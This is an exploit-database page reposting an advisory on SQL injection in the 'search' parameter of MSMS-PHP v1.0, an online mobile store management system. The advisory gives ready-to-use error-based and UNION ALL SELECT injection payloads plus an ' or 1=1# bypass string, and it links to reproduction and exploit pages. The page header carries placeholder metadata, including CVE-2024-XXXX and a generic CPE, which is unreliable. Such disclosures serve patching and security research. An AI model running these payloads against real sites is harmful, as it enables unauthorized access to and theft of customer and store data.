Advertisement






MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi

CVE Category Price Severity
CVE-2024-XXXX CWE-89 $500 Critical
Author Risk Exploitation Type Date
oretnom23 Critical Remote 2024-03-13
CPE
cpe:/a:vulnerable_application:x.x
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/S:U/C:H/I:H/A:H 0.87654 0.75432

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030028

Below is a copy:

MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi
## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 03/13/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.
There is a change in response when nu11secur1ty' or 1=1# is injected.  
Potential SQLi detected. Please confirm it manually after you check the POST, GET, or other requests... The payload from the puncher_SQLi_bypass_authentication module was submitted successfully after the test. The `search` parameter is vulnerable for Multiple SQLi attacks. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: search (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: p=products&search=-9068') OR 1 GROUP BY CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0 END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: p=products&search=-7515') UNION ALL SELECT 2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)

## Time spent:
00:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.